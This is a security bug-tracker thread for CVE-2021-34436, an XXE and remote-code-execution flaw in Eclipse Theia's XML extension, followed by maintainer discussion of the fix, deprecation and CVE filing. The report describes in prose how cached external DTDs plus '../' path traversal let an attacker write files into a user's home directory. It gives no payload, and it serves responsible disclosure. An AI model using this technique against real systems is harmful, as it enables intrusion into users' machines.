Some Eclipse Foundation services are deprecated, or will be soon. Please ensure you've read this important communication.

Bug 563174 (CVE-2021-34436)

Summary: Eclipse Theia XXE and RCE
Product: Community Reporter: Wayne Beaton <wayne.beaton>
Component: Vulnerability ReportsAssignee: Security vulnerabilitied reported against Eclipse projects <vulnerability.reports-inbox>
Status: RESOLVED FIXED QA Contact:
Severity: normal    
Priority: P3 CC: anton, david, marc.dumais, sven.efftinge, wayne.beaton
Version: unspecified   
Target Milestone: ---   
Hardware: PC   
OS: Linux   
Whiteboard:

Description Wayne Beaton CLA 2020-05-14 11:45:49 EDT 
From the Security Team Inbox:

--
It is possible to exploit the default Eclipse Theia build to obtain remote code execution (and XXE) via the theia-xml-extension. This extension uses lsp4xml (recently renamed to LemMinX) in order to provide language support for XML. This is installed by default. 

If it is run on an input file that references an external DTD, it will retrieve the external DTD file from the internet. This allows us to complete an XXE attack. But, far more interestingly it has a built in caching mechanism where it caches downloaded DTD files in `~/.lsp4xml/cache/`. Via path traversal characters (`../`) it is possible to request a DTD file and have it placed outside of the cache directory. From here, code execution can be achieved by using this primitive to write malicious files to the user's home directory. 

Interestingly, it looks like this attack was already discovered and fixed in lsp4xml but Theia has not updated the included Jar in 2 years. The simple fix for the RCE is just updating the included JAR. 

Fixing the XXE is slightly more involved. It looks like VSCode had this issue and they fixed it by defaulting to not allowing external entities. I think a similar fix would likely be appropriate here. 

Please let me know if I can be of any assistance with fixing either of these bugs. I've gotten a pretty good hang of the code bases from researching them, so I'm happy to help draft patches if that's helpful. 
--
Comment 1 David Dworken CLA 2020-05-21 22:44:01 EDT 
Hi All,

I just wanted to check in to see if you have decided on a path forward for fixing this. If not, I'm happy to take the lead on patching it. In my opinion all that is necessary is:

1. Requesting a CVE number for this
2. PRing the theia-ide/theia-xml-extension to update the JAR to the latest version (https://github.com/theia-ide/theia-xml-extension/blob/master/xml/lsp4xml/org.eclipse.lsp4xml-all.jar) 
3. Publicly announce the fix somehow (potentially just updating the repository is sufficient)

If you would like, I'm happy to request a CVE and prepare a PR myself. 

Thanks,
David
Comment 2 Marc Dumais CLA 2020-05-22 10:42:02 EDT 
Hi David,

Thanks for the report and offer to help. 

This may be a bit of a special situation: this extension, along with all Theia extension that provide language support using Language Server Protocol (LSP) are more-or-less deprecated, since the language client is going to be removed, ETA next month. Instead Theia will rely on filling this functionality through VS Code extensions. 

So it may not be necessary to actually fix this vulnerability - reporting it may be well enough. 

I wanted to mention as well that this extension is not that popular - practically speaking it looks like no one is pulling it from npm (zero weekly download vs ~20k for our main extensions):

https://www.npmjs.com/package/@theia/xml

https://www.npmjs.com/package/@theia/core

So taking all this into considerations, what are the opinions about how to proceed? 

Thanks,

Marc
Comment 3 Marc Dumais CLA 2020-05-22 10:50:04 EDT 
Additionally, I have just tried to add @theia/xml to both the stable (latest) and nightly (next) version of a Theia example application, and it results in non-starting/working applications. Most likely the extension would need to be updated to work with recent Theia releases. 

This I think further limits the practical applicability of this vulnerability, since the extension is not usable currently with recent Theia. I do not know how far we'd need to go back in Theia version before the extension works, but it could be quite a bit.
Comment 4 David Dworken CLA 2020-06-09 12:46:51 EDT 
Sorry for the late reply, I just realized that I wasn't getting notifications about this ticket. 

I think that makes sense about the impact of this being significantly limited which is great news to hear. Given that, I'm certainly fine with waiting a month for the code to be removed rather than working on a patch for this. Once the code has been removed, would you be okay with including in the patch notes a note about this bug? Just to ensure that if anyone is using it (and maybe has their own cached version from npm or anything else) they know to update.
Comment 5 Marc Dumais CLA 2020-06-09 18:56:52 EDT 
Hi David,

I think your suggestion is reasonable. 

Anton, I think you will be the one working on removing Theia's base language client? Can you take a note to mention this vulnerability in CHANGELOG? I am thinking we could provide a list of our @theia extensions that are made obsolete by this change, and we could also mention this exploit for @theia/xml. 

Wayne, WDYT? Ok with you?
Comment 6 Wayne Beaton CLA 2020-06-10 20:51:41 EDT 
> Wayne, WDYT? Ok with you?

I defer to your judgement.

If you're going to mention the vulnerability in the CHANGELOG, it sounds like a CVE may be order.

https://www.eclipse.org/projects/handbook/#vulnerability-cve
Comment 7 Anton Kosyakov CLA 2020-06-11 01:45:20 EDT 
> Anton, I think you will be the one working on removing Theia's base language client? Can you take a note to mention this vulnerability in CHANGELOG? I am thinking we could provide a list of our @theia extensions that are made obsolete by this change, and we could also mention this exploit for @theia/xml. 

Hi Marc, I'm not sure why we need this note. As far as I understand the issue is not in Theia framework code, but in 3rd party extension which is not used in practice and can be deleted already.
Comment 8 Marc Dumais CLA 2020-06-11 10:04:38 EDT 
(In reply to Anton Kosyakov from comment #7)
> > Anton, I think you will be the one working on removing Theia's base language 
> Hi Marc, I'm not sure why we need this note. As far as I understand the
> issue is not in Theia framework code, but in 3rd party extension which is
> not used in practice and can be deleted already.

Hi Anton,

Do you mean we could delete the versions of @theia/xml published on npm, and I guess the repo too, since it's already useless (does not work with recent Theia)?  Given that Theia extensions published on npm "rot" quite fast, it does seems to me this could be enough.
Comment 9 Marc Dumais CLA 2020-06-11 10:15:22 EDT 
> the issue is not in Theia framework code, but in 3rd party extension

That's correct, but it's still an extension community members made/maintained and it was published in the @theia namespace, so it looks like an official extension if one does not know better. 

I agree about it not being practically used though.
Comment 10 Anton Kosyakov CLA 2020-06-12 02:01:34 EDT 
Hi Marc,

> Do you mean we could delete the versions of @theia/xml published on npm, and I guess the repo too, since it's already useless (does not work with recent Theia)?

Yes, adopters should use https://marketplace.visualstudio.com/items?itemName=redhat.vscode-xml instead. There is no need to wait till we deprecate language support via Theia extensions.
Comment 11 Anton Kosyakov CLA 2020-06-12 02:03:01 EDT 
Should have pointed to Open VSX Registry instead of MS one: https://open-vsx.org/extension/redhat/vscode-xml :)
Comment 12 David Dworken CLA 2020-06-15 20:56:51 EDT 
I just want to chime in and say that since it is under the `theia` Github organization, as an end user it does seem to me that it is an official part of Theia (and there isn't any disclaimer in the readme).
Comment 13 Marc Dumais CLA 2020-06-15 23:52:35 EDT 
Anton - I agree, there is no need to wait to deal with that repo. 

David - would you be willing to provide the text, that Wayne will need to register the CVE? I think maybe the "director's cut" version of your initial report, in the description above, would work?
Comment 14 David Dworken CLA 2020-06-16 21:03:22 EDT 
Sure, how does the below description look? 

An XXE could be exploited against the theia-xml-extension in order to obtain remote code execution and local file disclosure if Theia was used to view a malicious XML file. This vulnerability came from depending on an out of date version of lsp4xml (recently renamed to LemMinX).
Comment 15 Wayne Beaton CLA 2021-08-16 16:02:51 EDT 
Housekeeping. We've exceeded our three month disclosure deadline, so I've removed the confidential flag.

(In reply to David Dworken from comment #14)
> Sure, how does the below description look? 
> 
> An XXE could be exploited against the theia-xml-extension in order to obtain
> remote code execution and local file disclosure if Theia was used to view a
> malicious XML file. This vulnerability came from depending on an out of date
> version of lsp4xml (recently renamed to LemMinX).

Give me a version range and a CWE [1] and I'll create the CVE.

[1] https://cwe.mitre.org/
Comment 16 Marc Dumais CLA 2021-08-30 17:33:41 EDT 
(In reply to Wayne Beaton from comment #15)
> 
> Give me a version range and a CWE [1] and I'll create the CVE.
> 
> [1] https://cwe.mitre.org/


Thanks Wayne. 

Here are all versions published (obtained from cmd "yarn info @theia/xml"): 
versions: [
    '0.1.1',
    '0.1.2',
    '0.2.0-next.28bc2735',
    '0.2.0-next.41406d98',
    '0.2.0-next.a2958907'
  ]

Can the range contain wildcards? if so it could be smt like: 
0.1.1 - 0.2.0*

CWEs:
XXE: CWE-611, 
path traversal: CWE-22
Comment 17 Wayne Beaton CLA 2021-09-02 16:51:06 EDT 
I've assigned CVE-2021-34436